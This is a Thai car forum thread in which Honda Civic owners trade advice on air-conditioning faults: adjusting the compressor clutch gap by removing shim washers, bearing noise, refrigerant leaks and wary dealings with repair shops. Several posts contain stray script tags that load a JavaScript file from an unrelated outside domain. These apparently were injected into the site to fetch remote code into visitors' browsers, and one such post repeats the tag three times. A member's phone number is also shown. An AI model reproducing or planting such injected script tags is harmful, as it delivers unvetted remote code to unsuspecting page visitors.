ตอบ
aonjang237

ชื่อเล่น: อ้น

เข้าร่วม: 11 มิถุนา 2013
ตอบ: 812

Guru ES
Guru ES

ได้รับคำขอบคุณ: 555
ให้คำขอบคุณ: 130

ปี: 2002
ศุกร์, 22 พฤศจิกา 2013 11:36 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
ของผมเวลาแอร์ทำงาน มีเสียงดังมาก เอาไปให้ช่างดูบอกว่าต้องเปลี่ยนใหม่ยกเลย เกือบหมื่น
ผมก็เลยยังไม่เปลี่ยน เพราะมันยังเย็นอยู่ ขับรถตอนเช้าๆ ความเย็นออกมาเป็นไอเลย ขนาดปรับต่ำสุดแล้ว 
ได้รับคำขอบคุณจาก: athongchum 
สมพงศ์หง้าฝา

ชื่อเล่น: พงศ์

เข้าร่วม: 03 สิงหา 2013
ตอบ: 209

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 72
ให้คำขอบคุณ: 0

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 22 พฤศจิกา 2013 16:22 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
เรื่องคือผมพึ่งซ้อมรถที่ถูกชนมาเขาน่าจาใช้ของเช็คนะคับ ผมใช้ประมา 3-4 เดือนคับ แล้วแอร์ก็ไม่เย็นเลย หลังจากนั้นผมไปเต็มน้ำยาแอร์มา ใช้ประมาณ 3 วันแอร์ก็ไม่เย็นคับแต่เย็นนิดๆ ไปถามร้านแอร์มาเข้าบอกว่าลองเคาะหน้าคลัชดี แต่เขาแนะนำให้เปลื่ยนหน้าคลัชคับ ราคา 2500 พร้อมน้ำยาแอร์ หรือเช็คว่าตรงใหนรั่วบ้าง พี่ว่าแพงหรือเปล่าคับ และสามารถซ่อมเองได้เปล่าคับ  ถ้าซื้ออะไหล่มาเปลี่ยน ผมอยู่กระบี่ เบอร์ติดต่อคับถ้าจากรุณา 0865958813 พงศ์คับ.... 
ple1653

เข้าร่วม: 07 มิถุนา 2012
ตอบ: 149

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 112
ให้คำขอบคุณ: 4

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 22 พฤศจิกา 2013 16:25 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
ข้อมูลเยี่ยม
athongchum

ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 23 พฤศจิกา 2013 10:47 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
aonjang237 พิมพ์ว่า:
ของผมเวลาแอร์ทำงาน มีเสียงดังมาก เอาไปให้ช่างดูบอกว่าต้องเปลี่ยนใหม่ยกเลย เกือบหมื่น
ผมก็เลยยังไม่เปลี่ยน เพราะมันยังเย็นอยู่ ขับรถตอนเช้าๆ ความเย็นออกมาเป็นไอเลย ขนาดปรับต่ำสุดแล้ว 

เสียงดังนี่น่าจะลูกปืนน่ะครับ เปลี่ยนแค่ลูกปืนก็ได้ แต่ต้องเช็คด้วยว่าคอคอมแอร์สึกหรือป่าวถ้าสึกคงต้องกลึงตีปลอกใหม่ด้วย สาเหตุลูกปืนแตกอาจจะมาจากพูเล่ด้วยน่ะครับ อย่าลืมเช็คพูเล่ด้วยว่ามันหมุนได้ศูนย์หรือป่าว ถ้าหมุนไม่ได้ศูนย์เปลี่ยนลูกปืนใหม่มาเดียวก็แตกอีกน่ะครับ

สมพงศ์หง้าฝา พิมพ์ว่า:
เรื่องคือผมพึ่งซ้อมรถที่ถูกชนมาเขาน่าจาใช้ของเช็คนะคับ ผมใช้ประมา 3-4 เดือนคับ แล้วแอร์ก็ไม่เย็นเลย หลังจากนั้นผมไปเต็มน้ำยาแอร์มา ใช้ประมาณ 3 วันแอร์ก็ไม่เย็นคับแต่เย็นนิดๆ ไปถามร้านแอร์มาเข้าบอกว่าลองเคาะหน้าคลัชดี แต่เขาแนะนำให้เปลื่ยนหน้าคลัชคับ ราคา 2500 พร้อมน้ำยาแอร์ หรือเช็คว่าตรงใหนรั่วบ้าง พี่ว่าแพงหรือเปล่าคับ และสามารถซ่อมเองได้เปล่าคับ  ถ้าซื้ออะไหล่มาเปลี่ยน ผมอยู่กระบี่ เบอร์ติดต่อคับถ้าจากรุณา 0865958813 พงศ์คับ.... 

หวัดดีครับพี่บ่าว ผมคนพังงาครับ แต่มาทำงานอยู่กทม ผมไม่ได้เซียนขนาดนั้นครับพี่อาศัยหาอ่านศึกษาหาข้อมูลเอา เรื่องแอร์ซ่อมเองคงยากครับ เครื่องมือต้องครบจริงๆ อาการของพี่ที่ว่าเย็นนิดๆ ผมว่ามันไม่น่าจะเป็นมาจากหน้าคลัชน่ะครับ ถ้าเป็นที่หน้าคลัช แอร์จะไม่เย็นเลยตอนเครื่องรอบต่ำ พอเร่งเครื่องรอบสูงขึ้นมาแรงเหนี่ยวนำมีเยอะคลัชจะจับและเย็นปกติ 

ถ้าใช้มา 3-4 เดือนแล้วต้องเติมน้ำยาแอร์ใหม่ ผมเดาว่าน้ำยารั่วล่ะครับ ปกติน้ำยามันไม่ได้ลดลงเร็วขนาดนั้นอย่างน้อยๆเป็นปีขึ้นไปน้ำยาถึงจะลดถึงขนาดว่าไม่เย็นเลยแล้วต้องเติมใหม่ ผมแนะนำพี่ลองเช็คตามข้อที่ 2 ก่อนครับ

เรื่องที่ 2 การเช็คน้ำยาแอร์โดยไม่ต้องใช้มิเตอร์ 

แล้วก็เปลี่ยนร้านเลยน่ะครับพี่ 
tanoy

ชื่อเล่น: ตอย

เข้าร่วม: 18 พฤศจิกา 2012
ตอบ: 99

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 68

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 27 พฤศจิกา 2013 14:52 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
tokmun002

ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 1 ธันวา 2013 07:55 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
แอร์ทำงานแล้วดังลั่นเลยครับ. ดังแบบที่คุณเอกว่า แตร็กๆๆๆเลยครับแอร์ตัดก็เงียบ แล้วล่าสุดเย็นบ้างไม่เย็นบ้างครับ ? คอมแอร์ลูกใหม่ใช้มา3ปี แต่ไม่ค่อยได้ขับไปไหนครับ. น่าจะเกิดจามระยะห่างหน้าครัชคอมแอร์ใช่มั้ยครับ?
athongchum

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 1 ธันวา 2013 10:50 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
tokmun002 พิมพ์ว่า:
แอร์ทำงานแล้วดังลั่นเลยครับ. ดังแบบที่คุณเอกว่า แตร็กๆๆๆเลยครับแอร์ตัดก็เงียบ แล้วล่าสุดเย็นบ้างไม่เย็นบ้างครับ ? คอมแอร์ลูกใหม่ใช้มา3ปี แต่ไม่ค่อยได้ขับไปไหนครับ. น่าจะเกิดจามระยะห่างหน้าครัชคอมแอร์ใช่มั้ยครับ?

เสียงดัง "แต๊ก" ที่ลงไว้นั้นผมก๊อปปี้คำพูดคนอื่นมาอีกที รถผมเองก็ไม่เคยเป็นด้วยสิ เลยไม่รู้ว่าแต๊กจริงๆแล้วมันดังยังไง แต่จากการวิเคราะห์ผมคิดว่าเสียงที่ดัง "แต๊ก" มันน่าจะดังเฉพาะตอนที่คลัชเริ่มจับกัน ด้วยระยะที่ห่างและการเหนื่ยวนำที่ลดลงทำให้หน้าคลัชกว่าจะจับกันได้ต้องใช้เวลามากขึ้นกว่าจะจับกันสนิทเลยทำให้เกิดเสียงขึ้น แต่ถ้าดังตลอดในขณะที่คอมแอร์ทำงาน ผมคิดว่าจะจะมาจากส่วนอื่นๆของระบบแอร์ เช่น ลูกปืนคอมแอร์ ลูกปืนพัดลมแอร์ รวมไปถึงจุดยึดต่างๆอาจจะหลวม โดยเฉพาะตัวคอมเอง เลยทำให้เกิดเสียงดังตลอดเวลาที่คอมแอร์ทำงานครับ

ส่วนที่ว่าแอร์เย็นบ้างไม่เย็นบ้างนั้น ไม่เย็นเวลาไหนบ้างครับ ไม่เย็นเฉพาะตอนรถจอดนิ่งอยู่กับที่หรือป่าวครับ
ได้รับคำขอบคุณจาก: tokmun002 
tokmun002

ครอบครัว ES
ครอบครัว ES

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 1 ธันวา 2013 11:55 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
athongchum พิมพ์ว่า:

เสียงดัง "แต๊ก" ที่ลงไว้นั้นผมก๊อปปี้คำพูดคนอื่นมาอีกที รถผมเองก็ไม่เคยเป็นด้วยสิ เลยไม่รู้ว่าแต๊กจริงๆแล้วมันดังยังไง แต่จากการวิเคราะห์ผมคิดว่าเสียงที่ดัง "แต๊ก" มันน่าจะดังเฉพาะตอนที่คลัชเริ่มจับกัน ด้วยระยะที่ห่างและการเหนื่ยวนำที่ลดลงทำให้หน้าคลัชกว่าจะจับกันได้ต้องใช้เวลามากขึ้นกว่าจะจับกันสนิทเลยทำให้เกิดเสียงขึ้น แต่ถ้าดังตลอดในขณะที่คอมแอร์ทำงาน ผมคิดว่าจะจะมาจากส่วนอื่นๆของระบบแอร์ เช่น ลูกปืนคอมแอร์ ลูกปืนพัดลมแอร์ รวมไปถึงจุดยึดต่างๆอาจจะหลวม โดยเฉพาะตัวคอมเอง เลยทำให้เกิดเสียงดังตลอดเวลาที่คอมแอร์ทำงานครับ

ส่วนที่ว่าแอร์เย็นบ้างไม่เย็นบ้างนั้น ไม่เย็นเวลาไหนบ้างครับ ไม่เย็นเฉพาะตอนรถจอดนิ่งอยู่กับที่หรือป่าวครับ

ทำแล้วครับ!คุณเอกเจ้าพ่อแหล่งความรู้ เบอร์12 ตัวเดียวและหาไรขัดเอาเวลาไข. เสียงแต๊กๆๆๆ ที่ว่าหายเลยครับ เครื่องไม่สั่นตอนแอร์ทำงานแล้วด้วยครับ. เพราะระยะห่างของครัชนี่เองเวลาแอร์ทำให้ไฟตกวูปเครื่องสั่น จะดับ ! ถอดออกมามีแหวนชิม สองตัวครับ มีบางมากกับหนา ผมถอดเอาตัวบางออกครับ คราวหน้าดังอีกค่อยถอดตัวหนาใส่ตัวบาง. ถ้าดังอีกถอดมันสองตัวเลย "ยังไงก็ขอบคุณคุณเอกครับ"ที่ถึงจะก็อบคำว่า"ดังแต๊กๆๆมาก็ตามแต่มันเป็นเสียงที่ดังทรมารใจอยู่นานแล้ว จนผมคิดว่าลูกปืนแตกอีกเพราะคอมลูกเก่าเป็น พอมาเจอกระทู้นี้เสียงนี่ใช่เลย!
athongchum

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 1 ธันวา 2013 12:03 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า

ทำแล้วครับ!คุณเอกเจ้าพ่อแหล่งความรู้ เบอร์12 ตัวเดียวและหาไรขัดเอาเวลาไข. เสียงแต๊กๆๆๆ ที่ว่าหายเลยครับ เครื่องไม่สั่นตอนแอร์ทำงานแล้วด้วยครับ. เพราะระยะห่างของครัชนี่เองเวลาแอร์ทำให้ไฟตกวูปเครื่องสั่น จะดับ ! ถอดออกมามีแหวนชิม สองตัวครับ มีบางมากกับหนา ผมถอดเอาตัวบางออกครับ คราวหน้าดังอีกค่อยถอดตัวหนาใส่ตัวบาง. ถ้าดังอีกถอดมันสองตัวเลย "ยังไงก็ขอบคุณคุณเอกครับ"ที่ถึงจะก็อบคำว่า"ดังแต๊กๆๆมาก็ตามแต่มันเป็นเสียงที่ดังทรมารใจอยู่นานแล้ว จนผมคิดว่าลูกปืนแตกอีกเพราะคอมลูกเก่าเป็น พอมาเจอกระทู้นี้เสียงนี่ใช่เลย!

ขอบคุณมากครับพี่ ที่ก๊อปมาคือข้อมูลทั้งหมดเลยน่ะครับเรื่องคลัช เครดิตอยู่ใต้ข้อความครับ แล้วสรุปว่า เสียงแต๊กที่ว่านี้ มันดังตลอดหรือดังเฉพาะตอนคอมเริ่มทำงานครับ ผมจะได้เก็บข้อมูลเอาไว้ ไม่รู้ที่ผมวิเคราะห์เอาไว้ถูกต้องหรือป่าว แล้วได้ถ่ายรูปขั้นตอนการทำไว้มั้ยครับ จะได้เก็บไว้เป็นตัวอย่างให้ท่านอื่นต่ออ่าครับ เพราะผมก็ยังไม่เคยทำเหมือนกัน 

"<script src="https://sport32news.com/civicesgroup.js">

ส่วนที่ไฟตกก็น่าจะเป็นเพราะแรงเหนี่ยวนำที่ต้องใช้มากกว่าปกติเพื่อจะให้หน้าคลัชจับกันอ่าครับ

tokmun002

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 1 ธันวา 2013 12:56 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
ดังตอนเปิดแอร์ครับ

Attached File :
เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
ความหนาต่างกันมาก
ความหนาต่างกันมาก
Attached File :
เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
ตั้งไว้ไขเข้าจะได้ไม่หมุนตาม
ตั้งไว้ไขเข้าจะได้ไม่หมุนตาม
athongchum

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 1 ธันวา 2013 13:04 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
ดังตอนเปิดแอร์ครับ

อ่อผมหมายถึง ดังเฉพาะตอนคอมเริ่มทำงาน หรือว่าดังตลอดเวลาที่คอมทำงาน ครับ

ส่วนรูปขอบคุณมากครับพี่ จะตั้งกระทู้ใหม่หรือจะให้ผมยกไปไว้หน้าแรกดีครับ
tokmun002

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 1 ธันวา 2013 16:22 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
รูปเอาไปใช้เลยครับ. ดังตอนคอมแอร์ทำงานเท่านั้นครับ!
athongchum

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 1 ธันวา 2013 18:01 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
รูปเอาไปใช้เลยครับ. ดังตอนคอมแอร์ทำงานเท่านั้นครับ!

พี่หมายถึงเสียงดังเฉพาะตอนคอมเริ่มทำงานเท่านั้น หลังจากทำงานไปแล้วจะไม่มีเสียง ใช่หรือป่าวครับ

"<script src="https://sport32news.com/civicesgroup.js">
tokmun002

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 1 ธันวา 2013 19:17 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
แอร์ทำงานดังยาวตลอด พอแอร์ตัดก็เงียบครับ ดังแต๊กๆๆคู่กับพัดลมแอร์ตลอดครับ
athongchum

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 1 ธันวา 2013 19:57 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
แอร์ทำงานดังยาวตลอด พอแอร์ตัดก็เงียบครับ ดังแต๊กๆๆคู่กับพัดลมแอร์ตลอดครับ

แสดงว่าผมเข้าใจผิดมาตลอดเลย ขอบคุณมากครับพี่
yodmillcon

ชื่อเล่น: ยอด

เข้าร่วม: 05 กุมภา 2012
ตอบ: 145

ได้รับคำขอบคุณ: 75
ให้คำขอบคุณ: 109

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 3 ธันวา 2013 15:39 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
กำลังข้องใจอยู่พอดีครับ 
peerawich

ชื่อเล่น: ตู่

เข้าร่วม: 18 สิงหา 2011
ตอบ: 117

ได้รับคำขอบคุณ: 50

ปี: 2005
พุธ, 30 เมษา 2014 21:48 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
ช่วยแนะนำร้านที่รับปรับหน้าครัชคอมแอร์ให้ทีครับ
รถผมเพิ่งเป็นเลยครับ สดๆร้อนๆเลยครับ
ผมอยู่แถวรัชดาภิเษกครับ
Noonueng

เข้าร่วม: 23 กุมภา 2012
ตอบ: 327

ได้รับคำขอบคุณ: 187
ให้คำขอบคุณ: 808

พุธ, 30 เมษา 2014 22:46 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
เปนความรู้ที่ดีมากเลยครับ
athongchum

ครอบครัว ES
ครอบครัว ES

พุธ, 30 เมษา 2014 22:56 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
peerawich พิมพ์ว่า:
ช่วยแนะนำร้านที่รับปรับหน้าครัชคอมแอร์ให้ทีครับ
รถผมเพิ่งเป็นเลยครับ สดๆร้อนๆเลยครับ
ผมอยู่แถวรัชดาภิเษกครับ

ค้นหาคำว่า "สุรเดชโชคชัยแอร์" ครับ 
nsmakkie

ชื่อเล่น: แม็กซ์

เข้าร่วม: 10 เมษา 2014
ตอบ: 332

ได้รับคำขอบคุณ: 236
ให้คำขอบคุณ: 356

สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 2 พฤษภาคม 2014 20:09 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
.... ....
TUNG11

ชื่อเล่น: ต้อง

เข้าร่วม: 31 พฤษภาคม 2012
ตอบ: 617

Guru ES
Guru ES

ได้รับคำขอบคุณ: 345
ให้คำขอบคุณ: 360

อังคาร, 6 พฤษภาคม 2014 15:09 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
..
แดง เบตง

ชื่อเล่น: แดง เบตง

เข้าร่วม: 17 เมษา 2014
ตอบ: 8

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 2

อังคาร, 6 พฤษภาคม 2014 15:19 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
เก็บข้อมูลครับ  ขอบคุณครับ พอดีรถผมมีอาการแบบนี้พอดีเลยครับ
kajupedza

เข้าร่วม: 18 มกรา 2014
ตอบ: 187

ได้รับคำขอบคุณ: 125

ศุกร์, 30 พฤษภาคม 2014 09:41 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
ขอถามหน่อยคับ ของเชียงกง ราคาประมานเท่าไร แล้วเรื่องถอดแหวนรองหรือแผ่นซิม ทำใมช่างถึงบอกว่า ถอดแล้วใช้ได้มะเกิน 1 เดือนกะพัง เค้าว่าแบบนั้น แล้วถ้าถอดมันจะใช้ได้อีกนานมะคับ หน้าคลัชคอมแอร์ อยากได้ช่างมีความซื่อสัต จริงๆมีแต่พวกจ้องฟันลุกค้า
athongchum

ครอบครัว ES
ครอบครัว ES

ศุกร์, 30 พฤษภาคม 2014 09:57 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
kajupedza พิมพ์ว่า:
ขอถามหน่อยคับ ของเชียงกง ราคาประมานเท่าไร แล้วเรื่องถอดแหวนรองหรือแผ่นซิม ทำใมช่างถึงบอกว่า ถอดแล้วใช้ได้มะเกิน 1 เดือนกะพัง เค้าว่าแบบนั้น แล้วถ้าถอดมันจะใช้ได้อีกนานมะคับ หน้าคลัชคอมแอร์ อยากได้ช่างมีความซื่อสัต จริงๆมีแต่พวกจ้องฟันลุกค้า

มันไม่เร็วขนาดนั้นหรอกครับ แต่ถ้ามีเงินเปลี่นนใหม่ถอดทีเดียวใช้ยาวๆครับ
kajupedza

ศุกร์, 30 พฤษภาคม 2014 12:56 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
อาการ ของผม จอดรถ มีแต่ลมไม่เย็น แต่ขับไปสักระยะถึงมีความเย็น บางครั้ง
ก้อเหลือแต่ลมครับ แต่วันนี้ สตาทรถ เย็นตลอดเลย มันใช่อาการของ คลัชคอมแอร์สึกหรอหรือเปล่า
แล้วถ้าเรายังไม่พร้อมเปลี่ยน สามารถจ้างร้านถอดแผ่นซิมให้มันใช้งานไปอีกสักระยะ ได้ไหมคับ
แล้วดูยังไง ถึงรุ้ว่า คลัชคอมแอร์เสีย ขอผุ้รุ้ช่วยตอบทีคับ
athongchum

ครอบครัว ES
ครอบครัว ES

เสาร์, 31 พฤษภาคม 2014 01:03 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
อาการ ของผม จอดรถ มีแต่ลมไม่เย็น แต่ขับไปสักระยะถึงมีความเย็น บางครั้ง
ก้อเหลือแต่ลมครับ แต่วันนี้ สตาทรถ เย็นตลอดเลย มันใช่อาการของ คลัชคอมแอร์สึกหรอหรือเปล่า
แล้วถ้าเรายังไม่พร้อมเปลี่ยน สามารถจ้างร้านถอดแผ่นซิมให้มันใช้งานไปอีกสักระยะ ได้ไหมคับ
แล้วดูยังไง ถึงรุ้ว่า คลัชคอมแอร์เสีย ขอผุ้รุ้ช่วยตอบทีคับ

นั่นแหละครับอาการคลัชใกล้หมด ถ้าเพิ่งเป็นคลัชคงยังเหลืออีกถอดแผ่นซิมออกช่วยได้ ใช้ได้อีกสักพัก(ใหญ่ๆ) 

คลัชส่วนใหญ่ไม่เสียครับ มีแต่หน้าคลัชหมด ต้องถอดดูครับ มองไม่เห็น
kajupedza

เสาร์, 31 พฤษภาคม 2014 08:55 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า

นั่นแหละครับอาการคลัชใกล้หมด ถ้าเพิ่งเป็นคลัชคงยังเหลืออีกถอดแผ่นซิมออกช่วยได้ ใช้ได้อีกสักพัก(ใหญ่ๆ) 

คลัชส่วนใหญ่ไม่เสียครับ มีแต่หน้าคลัชหมด ต้องถอดดูครับ มองไม่เห็น

ผมไม่มีความรุ้เรื่องถอดคลัช เลยคับ จะหาร้านที่ทำ ก้อยากเจอแต่เปลี่ยนเถอะๆมันสึกแล้ว ถอดแผ่นซิมกะใช้ได้ระยะไม่เกินเดือน
ผมละเจอช่างแบบนี้เหนื่อยใจจริงๆ กะจะเปนลุกค้าประจำ เจอพวกรุ้มากไม่แนะนำลุกค้า เรื่องระบบให้เข้าใจ จ้องฟันอย่างเดียว
ขอบคุณทุกคำตอบ ที่เข้ามาแชร์กันคับ

KCV_RX05

ชื่อเล่น: เค

เข้าร่วม: 16 พฤษภาคม 2014
ตอบ: 404

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 158

สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 31 พฤษภาคม 2014 09:10 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
ความรู้ขั้นเทพ
athongchum

ครอบครัว ES
ครอบครัว ES

เสาร์, 14 มิถุนา 2014 09:16 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า

ผมไม่มีความรุ้เรื่องถอดคลัช เลยคับ จะหาร้านที่ทำ ก้อยากเจอแต่เปลี่ยนเถอะๆมันสึกแล้ว ถอดแผ่นซิมกะใช้ได้ระยะไม่เกินเดือน
ผมละเจอช่างแบบนี้เหนื่อยใจจริงๆ กะจะเปนลุกค้าประจำ เจอพวกรุ้มากไม่แนะนำลุกค้า เรื่องระบบให้เข้าใจ จ้องฟันอย่างเดียว
ขอบคุณทุกคำตอบ ที่เข้ามาแชร์กันคับ

ทำใจครับ อันไหนพอทำเองได้ต้องหัดทำครับ 
chotpormsout

ชื่อเล่น: โชติ

เข้าร่วม: 13 มิถุนา 2014
ตอบ: 258

ได้รับคำขอบคุณ: 112
ให้คำขอบคุณ: 2

เสาร์, 19 กรกฎา 2014 01:50 - เอาความรู้บาแบ่งปัน ว่าด้วยเรื่องของแอร์ครับ ตั้งคลัชแอร์ เช็คน้ำยาแอร์ด้วยตาเปล่า
เกบข้อมูลครับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ตอบ
หน้า 2 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.